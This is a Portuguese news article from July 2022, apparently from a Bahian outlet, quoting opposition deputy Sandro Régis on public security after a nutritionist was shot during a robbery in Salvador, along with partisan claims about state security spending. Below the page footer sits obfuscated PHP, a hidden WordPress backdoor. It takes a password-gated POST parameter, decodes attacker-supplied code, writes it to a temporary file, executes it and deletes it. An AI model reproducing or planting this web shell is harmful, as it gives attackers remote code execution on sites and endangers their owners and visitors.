• SEJA BEM-VINDO

“Sandro Régis volta a denunciar onda de violência na Bahia: não temos segurança nem para trabalhar”

Publicado em: 23/07/2022 Atualizado:: julho 23, 2022

 

“A que ponto chegamos, não temos mais segurança nem para trabalhar”. O desabafo é do deputado estadual Sandro Régis (União Brasil), líder da bancada de oposição na Assembleia Legislativa da Bahia (AL-BA), ao lamentar o ataque criminoso contra a nutricionista Esperança Cedraz Brandão, baleada nesta sexta-feira (22) quando chegava ao trabalho, no bairro de Nazaré.

 

A profissional sofreu uma tentativa de assalto por volta das 6h da manhã e, mesmo sem oferecer reação, levou um tiro no rosto próximo ao olho. Ela foi socorrida para o Hospital Santa Isabel, onde trabalha. Segundo boletim médico deste sábado (23), o quadro clínico dela é estável.

 

“Estamos vivendo um verdadeiro caos na segurança pública da Bahia, que inverte a ordem das coisas. Enquanto a bandidagem está solta, a população fica amedrontada. Veja a que ponto chegamos, não temos mais segurança nem para trabalhar, ter um momento de lazer com a família, ir a um restaurante. O governo do estado perdeu o controle da situação”, pontua Sandro Régis.

 

A insegurança no estado se traduz nos indicadores que apontam a Bahia como líder nacional no ranking de homicídios, segundo levantamento do Monitor da Violência, do G1 com a Universidade de São Paulo.

 

“A verdade é que a segurança pública nunca foi prioridade nos governos do PT. A famílias baianas precisam de um governador com pulso firme e coragem para enfrentar o problema e colocar a bandidagem na cadeia”, acrescenta Sandro Régis, ao reafirmar que o ex-prefeito de Salvador ACM Neto tem as credenciais para assumir o Executivo estaduais partir de 2023.

 

Dados da plataforma Fiplan/Balanço do Estado mostra que o investimento em Segurança Pública na Bahia não chegou a 5% nos últimos 15 anos de gestões do PT.

 

De 2007, início do governo Jaques Wagner, até 2021, o investimento no setor correspondeu apenas a 4,07% do aporte total do Estado.

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}